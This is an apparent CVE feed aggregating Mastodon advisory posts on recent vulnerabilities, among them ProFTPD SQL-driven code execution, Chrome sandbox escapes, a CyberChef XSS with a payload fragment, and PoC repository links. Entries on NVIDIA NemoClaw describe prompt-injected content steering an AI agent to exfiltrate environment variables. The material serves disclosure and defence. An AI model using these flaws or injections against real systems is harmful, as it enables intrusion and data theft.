Integer underflow in the DHCPv6 sub-option parser in FreeRTOS-Plus-TCP before V4.4.1 and V4.2.6 allows an adjacent network actor to corrupt the device's IPv6 address assignment, DNS configuration, and lease times, and to cause a denial of service (permanent IP task freeze requiring hardware reset) by sending a single crafted DHCPv6 packet. The issue is present whenever DHCPv6 is enabled.

thehackerwire@mastodon.social at 2026-04-29T23:01:45.000Z ##

🟠 CVE-2026-7424 - High (8.1)

Integer underflow in the DHCPv6 sub-option parser in FreeRTOS-Plus-TCP before V4.4.1 and V4.2.6 allows an adjacent network actor to corrupt the device's IPv6 address assignment, DNS configuration, and lease times, and to cause a denial of service ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T23:01:45.000Z ##

🟠 CVE-2026-7424 - High (8.1)

Integer underflow in the DHCPv6 sub-option parser in FreeRTOS-Plus-TCP before V4.4.1 and V4.2.6 allows an adjacent network actor to corrupt the device's IPv6 address assignment, DNS configuration, and lease times, and to cause a denial of service ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7418
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-29T22:16:22.620000

2 posts

A vulnerability was determined in UTT HiPER 1250GW up to 3.2.7-210907-180535. This vulnerability affects the function strcpy of the file route/goform/NTP. Executing a manipulation of the argument Profile can lead to buffer overflow. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized.

thehackerwire@mastodon.social at 2026-04-29T23:00:12.000Z ##

🟠 CVE-2026-7418 - High (8.8)

A vulnerability was determined in UTT HiPER 1250GW up to 3.2.7-210907-180535. This vulnerability affects the function strcpy of the file route/goform/NTP. Executing a manipulation of the argument Profile can lead to buffer overflow. The attack may...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T23:00:12.000Z ##

🟠 CVE-2026-7418 - High (8.8)

A vulnerability was determined in UTT HiPER 1250GW up to 3.2.7-210907-180535. This vulnerability affects the function strcpy of the file route/goform/NTP. Executing a manipulation of the argument Profile can lead to buffer overflow. The attack may...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-34965
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-29T21:31:37

2 posts

Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection rules parameters. Attackers can inject malicious PHP code through rule parameters which is written directly to server-side PHP files and executed via incl

thehackerwire@mastodon.social at 2026-04-29T23:01:26.000Z ##

🟠 CVE-2026-34965 - High (8.8)

Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection r...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T23:01:26.000Z ##

🟠 CVE-2026-34965 - High (8.8)

Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection r...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42515
(0 None)

EPSS: 0.05%

updated 2026-04-29T21:14:23.977000

1 posts

This vulnerability exists in e-Sushrut due to improper access control in resource access validation. An authenticated attacker could exploit this vulnerability by manipulating parameter in the API request URL to gain unauthorized access to sensitive information of patients on the targeted system.

offseq@infosec.exchange at 2026-04-29T09:00:29.000Z ##

New HIGH severity vuln: CVE-2026-42515 impacts CDAC-Noida e-Sushrut HMIS (CVSS 7.1). Authenticated users can bypass auth via manipulated API params — risking patient data. No patch yet. Restrict access & monitor vendor updates. radar.offseq.com/threat/cve-20 #OffSeq #Healthcare #CVE #Security

##

CVE-2026-5166
(9.6 CRITICAL)

EPSS: 0.00%

updated 2026-04-29T21:13:30.563000

4 posts

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus Software Center allows Path Traversal. This issue affects Pardus Software Center: before 1.0.3.

offseq at 2026-04-30T03:00:40.812Z ##

🚩 CRITICAL: CVE-2026-5166 in Pardus Software Center <1.0.3 enables path traversal — attackers may access/modify files outside restricted dirs. No patch yet. Restrict access, monitor updates. radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-04-29T23:42:00.000Z ##

🔴 CVE-2026-5166 - Critical (9.6)

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus Software Center allows Path Traversal.

This issue affects Pardus Software Center: befor...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-04-30T03:00:40.000Z ##

🚩 CRITICAL: CVE-2026-5166 in Pardus Software Center <1.0.3 enables path traversal — attackers may access/modify files outside restricted dirs. No patch yet. Restrict access, monitor updates. radar.offseq.com/threat/cve-20 #OffSeq #Vuln #Pardus #Infosec

##

thehackerwire@mastodon.social at 2026-04-29T23:42:00.000Z ##

🔴 CVE-2026-5166 - Critical (9.6)

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus Software Center allows Path Traversal.

This issue affects Pardus Software Center: befor...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-30893
(9.0 CRITICAL)

EPSS: 0.00%

updated 2026-04-29T20:16:29.660000

3 posts

Wazuh is a free and open source platform used for threat prevention, detection, and response. From version 4.4.0 to before version 4.14.4, a path traversal vulnerability in Wazuh's cluster synchronization extraction routine allows an authenticated cluster peer to write arbitrary files outside the intended extraction directory on other cluster nodes. This can be escalated to code execution in the W

Matchbook3469@mastodon.social at 2026-04-30T08:40:04.000Z ##

🔴 New security advisory:

CVE-2026-30893 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
yazoul.net/advisory/cve/cve-20

#CVE #SecurityPatching #HackerNews

##

thehackerwire@mastodon.social at 2026-04-29T23:41:47.000Z ##

🔴 CVE-2026-30893 - Critical (9)

Wazuh is a free and open source platform used for threat prevention, detection, and response. From version 4.4.0 to before version 4.14.4, a path traversal vulnerability in Wazuh's cluster synchronization extraction routine allows an authenticated...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T23:41:47.000Z ##

🔴 CVE-2026-30893 - Critical (9)

Wazuh is a free and open source platform used for threat prevention, detection, and response. From version 4.4.0 to before version 4.14.4, a path traversal vulnerability in Wazuh's cluster synchronization extraction routine allows an authenticated...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7466
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-29T19:16:27.013000

2 posts

AgentFlow contains an arbitrary code execution vulnerability that allows attackers to execute local Python pipeline files by supplying a user-controlled pipeline_path parameter to the POST /api/runs and POST /api/runs/validate endpoints. Attackers can induce requests to the local AgentFlow API to load and execute existing Python pipeline files on disk, resulting in code execution in the context of

thehackerwire@mastodon.social at 2026-04-29T23:01:36.000Z ##

🟠 CVE-2026-7466 - High (8.8)

AgentFlow contains an arbitrary code execution vulnerability that allows attackers to execute local Python pipeline files by supplying a user-controlled pipeline_path parameter to the POST /api/runs and POST /api/runs/validate endpoints. Attackers...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T23:01:36.000Z ##

🟠 CVE-2026-7466 - High (8.8)

AgentFlow contains an arbitrary code execution vulnerability that allows attackers to execute local Python pipeline files by supplying a user-controlled pipeline_path parameter to the POST /api/runs and POST /api/runs/validate endpoints. Attackers...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0204
(8.0 HIGH)

EPSS: 0.00%

updated 2026-04-29T18:31:42

1 posts

A vulnerability in the access control mechanism of SonicOS may allow certain management interface functions to be accessible under specific conditions.

thehackerwire@mastodon.social at 2026-04-29T19:01:06.000Z ##

🟠 CVE-2026-0204 - High (8)

A vulnerability in the access control mechanism of SonicOS may allow certain management interface functions to be accessible under specific conditions.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-6849
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-29T18:31:41

1 posts

Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus OS My Computer allows OS Command Injection. This issue affects Pardus OS My Computer: from <=0.7.5 before 0.8.0.

1 repos

https://github.com/osmancanvural/CVE-2026-6849

thehackerwire@mastodon.social at 2026-04-29T19:01:16.000Z ##

🟠 CVE-2026-6849 - High (8.8)

Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus OS My Computer allows OS Command Injection.

This issue affects Pardus OS My...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5712
(8.0 HIGH)

EPSS: 0.00%

updated 2026-04-29T18:16:05.180000

1 posts

This vulnerability impacts all versions of IdentityIQ and allows an authenticated identity that is the requestor or assignee of a work item to edit the definition of a role without having an assigned capability that would allow role editing.

thehackerwire@mastodon.social at 2026-04-29T19:00:56.000Z ##

🟠 CVE-2026-5712 - High (8)

This vulnerability impacts all versions of IdentityIQ and allows an authenticated identity that is the requestor or assignee of a work item to edit the definition of a role without having an assigned capability that would allow role editing.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42167
(8.1 HIGH)

EPSS: 0.24%

updated 2026-04-29T16:16:25.303000

4 posts

mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary code via a username, in scenarios where there is logging of USER requests with an expansion such as %U, and the SQL backend allows commands (e.g., COPY TO PROGRAM).

Nuclei template

2 repos

https://github.com/ZeroPathAI/proftpd-CVE-2026-42167-poc

https://github.com/dinosn/proftpd-CVE-2026-42167-analysis

undercodenews@mastodon.social at 2026-04-30T07:13:44.000Z ##

Critical ProFTPD SQL Injection Flaw Exposes Thousands of Internet-Facing FTP Servers to Remote Attacks

Introduction A newly disclosed security vulnerability in ProFTPD, one of the most widely used FTP server solutions on the internet, has raised serious concerns across the hosting and Linux administration community. Tracked as CVE-2026-42167, the flaw affects the mod_sql extension and can allow attackers to execute code remotely, bypass authentication, escalate…

undercodenews.com/critical-pro

##

Tinolle@infosec.exchange at 2026-04-29T18:25:57.000Z ##

CVE-2026-42167 Allows Auth Bypass And RCE In ProFTPD
zeropath.com/blog/proftpd-cve-

##

threatcodex@infosec.exchange at 2026-04-29T14:17:39.000Z ##

CVE-2026-42167 Allows Auth Bypass And RCE In ProFTPD
#CVE_2026_42167
zeropath.com/blog/proftpd-cve-

##

thehackerwire@mastodon.social at 2026-04-28T23:27:41.000Z ##

🟠 CVE-2026-42167 - High (8.1)

mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary code via a username, in scenarios where there is logging of USER requests with an expansion such as %U, and the SQL backend allows commands (e.g., COPY TO PROGRAM).

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7344
(8.8 HIGH)

EPSS: 0.01%

updated 2026-04-29T15:31:44

1 posts

Use after free in Accessibility in Google Chrome on Windows prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)

offseq@infosec.exchange at 2026-04-29T01:30:26.000Z ##

CRITICAL: Chrome <147.0.7727.138 on Windows is vulnerable to a use-after-free in Accessibility (CVE-2026-7344). Allows sandbox escape after renderer compromise. Patch now to mitigate risk. radar.offseq.com/threat/cve-20 #OffSeq #Chrome #Vuln #Cybersecurity

##

CVE-2026-7343
(9.8 CRITICAL)

EPSS: 0.03%

updated 2026-04-29T15:31:43

1 posts

Use after free in Views in Google Chrome on Windows prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)

offseq@infosec.exchange at 2026-04-29T00:00:40.000Z ##

⚠️ CRITICAL: CVE-2026-7343 in Chrome (Windows <147.0.7727.138) is a use-after-free in Views that could allow renderer sandbox escape. Patch ASAP to mitigate. No known exploits yet. radar.offseq.com/threat/cve-20 #OffSeq #Chrome #Vulnerability #Security

##

CVE-2026-42523
(9.0 CRITICAL)

EPSS: 0.00%

updated 2026-04-29T15:16:07.077000

3 posts

Jenkins GitHub Plugin 1.46.0 and earlier improperly processes the current job URL as part of JavaScript implementing validation of the feature "GitHub hook trigger for GITScm polling", resulting in a stored cross-site scripting (XSS) vulnerability exploitable by non-anonymous attackers with Overall/Read permission.

Matchbook3469@mastodon.social at 2026-04-30T11:45:01.000Z ##

🚨 New security advisory:

CVE-2026-42523 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
yazoul.net/advisory/cve/cve-20

#Cybersecurity #ZeroDay #ThreatIntel

##

offseq at 2026-04-30T04:30:29.725Z ##

🚨 CRITICAL: Jenkins GitHub Plugin ≤1.46.0 has a stored XSS (CVE-2026-42523). Attackers with Overall/Read permission can run JS in users' browsers. Limit permissions & check vendor for patches. radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-04-30T04:30:29.000Z ##

🚨 CRITICAL: Jenkins GitHub Plugin ≤1.46.0 has a stored XSS (CVE-2026-42523). Attackers with Overall/Read permission can run JS in users' browsers. Limit permissions & check vendor for patches. radar.offseq.com/threat/cve-20 #OffSeq #Jenkins #XSS #Vuln

##

CVE-2026-5760
(9.8 CRITICAL)

EPSS: 0.38%

updated 2026-04-29T14:16:19.920000

1 posts

SGLang's reranking endpoint (/v1/rerank) achieves Remote Code Execution (RCE) when a model file containing a malcious tokenizer.chat_template is loaded, as the Jinja2 chat templates are rendered using an unsandboxed jinja2.Environment().

1 repos

https://github.com/Stuub/SGLang-0.5.9-RCE

canartuc@mastodon.social at 2026-04-29T14:10:45.000Z ##

CERT/CC issued advisory VU#915947 for SGLang (an AI inference server), CVE-2026-5760, severity 9.8. A poisoned GGUF model file carries a chat-template that SGLang renders through Jinja2 with no sandbox. Arbitrary Python runs on the host. Same root cause as llama-cpp-python (2024) and vLLM (2025). Sandboxed Jinja2 existed the whole time and three frameworks left the line untouched. Any GGUF you did not build yourself runs code on load.

#AI #InfoSec #CyberSecurity #OpenSource #LLM

##

CVE-2026-7321
(9.6 CRITICAL)

EPSS: 0.04%

updated 2026-04-29T06:16:08.357000

1 posts

Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking component. This vulnerability was fixed in Firefox 150, Thunderbird 150, and Firefox ESR 140.10.1.

thehackerwire@mastodon.social at 2026-04-28T23:38:22.000Z ##

🔴 CVE-2026-7321 - Critical (9.6)

Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking component. This vulnerability was fixed in Firefox ESR 140.10.1.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42615
(7.2 HIGH)

EPSS: 0.01%

updated 2026-04-29T04:16:41.750000

2 posts

GCHQ CyberChef before 11.0.0 allows XSS via Show Base64 offsets, as demonstrated by the /#recipe=Show_Base64_offsets('%3Cscript substring.

cR0w@infosec.exchange at 2026-04-29T04:41:24.000Z ##

RE: infosec.exchange/@cR0w/1164832

lol

cve.org/CVERecord?id=CVE-2026-

##

offseq@infosec.exchange at 2026-04-29T04:30:25.000Z ##

🔎 XSS (HIGH, CVSS 7.2) in GCHQ CyberChef <11.0.0 (CVE-2026-42615): Improper input neutralization in Show Base64 offsets lets attackers inject scripts remotely — info theft/session hijack possible. No fix yet. Avoid untrusted input. radar.offseq.com/threat/cve-20 #OffSeq #CyberChef #XSS

##

CVE-2026-23773
(4.3 MEDIUM)

EPSS: 0.01%

updated 2026-04-29T04:16:40.867000

1 posts

Dell Disk Library for Mainframe, version(s) DLm 8700/2700 contain(s) a Server-Side Request Forgery (SSRF) vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Server-side request forgery.

offseq@infosec.exchange at 2026-04-29T06:00:26.000Z ##

MEDIUM severity SSRF (CVE-2026-23773) found in Dell DLm8700 📢. Low-priv remote attackers can trigger server-side requests. No known exploits, no patch yet — restrict access & follow vendor advisories. radar.offseq.com/threat/cve-20 #OffSeq #SSRF #Dell #Cybersecurity

##

CVE-2026-41873
(9.8 CRITICAL)

EPSS: 0.12%

updated 2026-04-29T00:31:25

1 posts

** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in Pony Mail leading to admin account takeover. This issue affects all versions of the Lua implementation of Pony Mail. There is a Python implementation under development under the name "Pony Mail Foal" that is not affected by this issue, but hasn't been released yet. As

thehackerwire@mastodon.social at 2026-04-28T23:27:51.000Z ##

🔴 CVE-2026-41873 - Critical (9.8)

** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in Pony Mail leading to admin account takeover.

This issue affects all versions of the Lua implementation of Pony Mail....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-32202
(4.3 MEDIUM)

EPSS: 7.19%

updated 2026-04-28T21:47:02.087000

7 posts

Protection mechanism failure in Windows Shell allows an unauthorized attacker to perform spoofing over a network.

1 repos

https://github.com/solarlynxsqueeze/CVE-2026-32202

571906@ap.podcastindex.org at 2026-04-30T02:00:02.000Z ##

New Episode: SANS Stormcast Thursday, April 30th, 2026: Odd Requests; MSFT LNK Bug Exploited; Secure Boot Fix; TLS Updates; SAP npm malware

Shownotes:

Today's Odd Web Requests
https://isc.sans.edu/diary/Today%27s%20Odd%20Web%20Requests/32934
Incomplete Patch of APT28's Zero-Day Leads to CVE-2026-32202
https://www.akamai.com/blog/security-research/2026/apr/incomplete-patch-apt28s-zero

Transcript

AntennaPod | Anytime Player | Apple Podcasts | Castamatic | CurioCaster | Fountain | gPodder | Overcast | Pocket Casts | Podcast Addict | Podcast Guru | Podnews | Podverse | Truefans

Or Listen right here.

##

AAKL@infosec.exchange at 2026-04-29T16:54:57.000Z ##

Broadcom has a new advisory for a critical vulnerability:

ESM Microservice 15.0 Vulnerability in Apache Tomcat support.broadcom.com/web/ecx/s #Broadcom #ApacheTomCat
---

Cisco has tagged the Internet Systems Consortium and wolfSSL for zero-day reports talosintelligence.com/vulnerab @TalosSecurity #zeroday
---

From yesterday:

CISA added two vulnerabilities to the KEV catalogue:

- CVE-2026-32202: Microsoft Windows Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2024-1708: ConnectWise ScreenConnect Path Traversal Vulnerability cve.org/CVERecord?id=CVE-2024-

- Also, one industrial vulnerability cisa.gov/news-events/ics-advis #CISA #Microsoft #vulnerability #infosec

##

beyondmachines1@infosec.exchange at 2026-04-29T11:01:43.000Z ##

Microsoft Confirms Active Exploitation of Windows Shell Flaw CVE-2026-32202

Microsoft confirmed active exploitation of CVE-2026-32202, a Windows Shell flaw that allows zero-click NTLM credential theft via malicious LNK files. The vulnerability is an incomplete fix for earlier RCE flaws used by the APT28 threat group in targeted espionage campaigns.

**Apply Microsoft's April 2026 patches immediately to all Windows systems, as this vulnerability steals your credentials just by viewing a folder containing a malicious shortcut file - no clicking required. Block outbound SMB traffic (ports 445 and 139) at your firewall to prevent credential theft.**
#cybersecurity #infosec #attack #activeexploit
beyondmachines.net/event_detai

##

benzogaga33@mamot.fr at 2026-04-29T09:40:03.000Z ##

Vols d’identifiants sur Windows : Microsoft révèle l’exploitation de la CVE-2026-32202 it-connect.fr/vols-didentifian #ActuCybersécurité #Cybersécurité #Vulnérabilité #Microsoft #Windows

##

secdb@infosec.exchange at 2026-04-28T20:00:14.000Z ##

🚨 [CISA-2026:0428] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2024-1708 (secdb.nttzen.cloud/cve/detail/)
- Name: ConnectWise ScreenConnect Path Traversal Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: ConnectWise
- Product: ScreenConnect
- Notes: connectwise.com/company/trust/ ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-32202 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260428 #cisa20260428 #cve_2024_1708 #cve_2026_32202 #cve20241708 #cve202632202

##

Chris@mast.social at 2026-04-28T18:17:44.000Z ##

🛡️ Title: Windows Shell Spoofing Vulnerability
Description

🛡️ Protection mechanism failure in Windows Shell allows an unauthorized attacker to perform spoofing over a network.

cve.org/CVERecord?id=CVE-2026-

#cybersecurity #security #windows #microsoft

##

cisakevtracker@mastodon.social at 2026-04-28T18:01:08.000Z ##

CVE ID: CVE-2026-32202
Vendor: Microsoft
Product: Windows
Date Added: 2026-04-28
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2024-1708
(8.4 HIGH)

EPSS: 81.62%

updated 2026-04-28T21:44:53.770000

4 posts

ConnectWise ScreenConnect 23.9.7 and prior are affected by path-traversal vulnerability, which may allow an attacker the ability to execute remote code or directly impact confidential data or critical systems.

3 repos

https://github.com/cjybao/CVE-2024-1709-and-CVE-2024-1708

https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE

https://github.com/Teexo/ScreenConnect-CVE-2024-1709-Exploit

AAKL@infosec.exchange at 2026-04-29T16:54:57.000Z ##

Broadcom has a new advisory for a critical vulnerability:

ESM Microservice 15.0 Vulnerability in Apache Tomcat support.broadcom.com/web/ecx/s #Broadcom #ApacheTomCat
---

Cisco has tagged the Internet Systems Consortium and wolfSSL for zero-day reports talosintelligence.com/vulnerab @TalosSecurity #zeroday
---

From yesterday:

CISA added two vulnerabilities to the KEV catalogue:

- CVE-2026-32202: Microsoft Windows Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2024-1708: ConnectWise ScreenConnect Path Traversal Vulnerability cve.org/CVERecord?id=CVE-2024-

- Also, one industrial vulnerability cisa.gov/news-events/ics-advis #CISA #Microsoft #vulnerability #infosec

##

beyondmachines1@infosec.exchange at 2026-04-29T16:01:43.000Z ##

CISA Reports Active Exploitation of ConnectWise Flaw

CISA reports active exploitation of ConnectWise ScreenConnect (CVE-2024-1708) that allow for remote code execution and security mechanism bypasses. CISA is requiring patching by May 12, 2026.

**If you're using ConnectWise ScreenConnect, update to the latest patched version ASAP. Your ScreenConnect is being actively exploited to deploy ransomware. If you can't patch right away, restrict access to the ScreenConnect server to trusted networks only and monitor for any signs of unauthorized access or suspicious activity.**
#cybersecurity #infosec #attack #activeexploit
beyondmachines.net/event_detai

##

secdb@infosec.exchange at 2026-04-28T20:00:14.000Z ##

🚨 [CISA-2026:0428] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2024-1708 (secdb.nttzen.cloud/cve/detail/)
- Name: ConnectWise ScreenConnect Path Traversal Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: ConnectWise
- Product: ScreenConnect
- Notes: connectwise.com/company/trust/ ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-32202 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260428 #cisa20260428 #cve_2024_1708 #cve_2026_32202 #cve20241708 #cve202632202

##

cisakevtracker@mastodon.social at 2026-04-28T18:00:52.000Z ##

CVE ID: CVE-2024-1708
Vendor: ConnectWise
Product: ScreenConnect
Date Added: 2026-04-28
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2026-25874
(9.8 CRITICAL)

EPSS: 0.11%

updated 2026-04-28T21:37:03

3 posts

LeRobot contains an unsafe deserialization vulnerability in the async inference pipeline where pickle.loads() is used to deserialize data received over unauthenticated gRPC channels without TLS in the policy server and robot client components. An unauthenticated network-reachable attacker can achieve arbitrary code execution on the server or client by sending a crafted pickle payload through the S

beyondmachines1@infosec.exchange at 2026-04-29T13:01:43.000Z ##

Critical Unpatched RCE Vulnerability in Hugging Face LeRobot Robotics Platform

Hugging Face's LeRobot robotics platform contains a critical unpatched vulnerability (CVE-2026-25874) that allows unauthenticated remote code execution via unsafe pickle deserialization. Attackers can exploit exposed gRPC endpoints to take full control of robotics servers and connected hardware.

**If you're using Hugging Face LeRobot, make sure all robot devices and servers are isolated from the internet and accessible only from trusted networks. Until version 0.6.0 is released with a fix for CVE-2026-25874, run LeRobot as a non-root user inside restricted containers, and monitor for unusual processes or outbound traffic.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

hackerworkspace@infosec.exchange at 2026-04-29T04:16:35.000Z ##

Critical Unpatched Flaw Leaves Hugging Face LeRobot Open to Unauthenticated RCE

thehackernews.com/2026/04/crit

Read on HackerWorkspace: hackerworkspace.com/article/cr

#cybersecurity #aisecurity #vulnerability

##

netsecio@mastodon.social at 2026-04-28T16:41:17.000Z ##

📰 Critical Unpatched RCE Flaw in Hugging Face's LeRobot AI Platform Puts Robotics Systems at Risk

🚨 CRITICAL FLAW: Unpatched RCE (CVE-2026-25874, CVSS 9.3) in Hugging Face's LeRobot AI platform. Unsafe deserialization allows unauthenticated attackers to execute code. #CVE202625874 #HuggingFace #AI #RCE

🔗 cyber.netsecops.io

##

CVE-2026-24222
(8.6 HIGH)

EPSS: 0.04%

updated 2026-04-28T21:36:23

2 posts

NVIDIA NeMoClaw contains a vulnerability in the sandbox environment initialization component, where a remote attacker could cause improper access control by sending prompt-injected content that causes the agent to read and exfiltrate host environment variables not properly restricted during sandbox creation. A successful exploit of this vulnerability might lead to information disclosure.

thehackerwire@mastodon.social at 2026-04-28T22:33:42.000Z ##

🟠 CVE-2026-24222 - High (8.6)

NVIDIA NeMoClaw contains a vulnerability in the sandbox environment initialization component, where a remote attacker could cause improper access control by sending prompt-injected content that causes the agent to read and exfiltrate host environm...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer #Nvidia #infoec #vulnerability

##

CVE-2026-24231
(6.3 MEDIUM)

EPSS: 0.01%

updated 2026-04-28T21:36:22

1 posts

NVIDIA NemoClaw contains a vulnerability in the validateEndpointUrl() SSRF protection component, where an attacker could cause a server-side request forgery by supplying a crafted endpoint URL referencing the 0.0.0.0/8 address range through a blueprint configuration file or CLI flag. A successful exploit of this vulnerability may lead to information disclosure.

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

